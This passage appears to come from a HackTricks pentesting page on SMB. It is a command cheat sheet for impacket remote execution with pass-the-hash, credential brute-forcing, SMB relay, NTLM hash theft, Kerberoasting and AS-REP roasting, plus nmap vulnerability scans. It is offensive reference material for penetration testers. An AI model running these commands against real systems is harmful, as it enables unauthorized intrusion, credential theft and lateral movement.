Both options create a new service (using \pipe\svcctl via SMB) on the victim machine and use it to execute something (psexec uploads an executable to the ADMIN$ share, while smbexec points the service at cmd.exe/powershell.exe and puts the payload in the arguments, a file-less technique).
More information about psexec and smbexec.
In kali it is located in /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
With the -k parameter you can authenticate against kerberos instead of NTLM
wmiexec/dcomexec
Stealthily execute a command shell without touching the disk or starting a new service, using DCOM via port 135.
In kali it is located in /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
With the -k parameter you can authenticate against kerberos instead of NTLM
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Execute commands via the Task Scheduler (using \pipe\atsvc via SMB).
In kali it is located in /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Impacket reference
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller)
Ksmbd Attack Surface And Fuzzing Syzkaller
Bruteforce user credentials
This is not recommended: you could lock an account out if you exceed the maximum allowed attempts
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
This attack uses the Responder toolkit to capture SMB authentication sessions on an internal network and relays them to a target machine. If the authentication session is successful, it automatically drops you into a system shell. Relaying only works against targets that do not require SMB signing, so check the server's SecurityMode first (domain controllers require signing by default; most member servers and workstations do not).
More information about this attack here.
SMB-Trap
The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: img src="\\10.10.10.10\path\image.jpg"
This happens with the functions:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Which are used by some browsers and tools (like Skype)
SMBTrap using MitMf
NTLM Theft
Similar to SMB Trapping, planting malicious files on a target system (via SMB, for example) can trigger an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an SMB relay attack.
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 139,445 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
References
- NetExec (CME) wiki – Kerberos usage
- Pentesting Kerberos (88) – client setup and troubleshooting
- ShareHound (collector)
- ShareQL (DSL)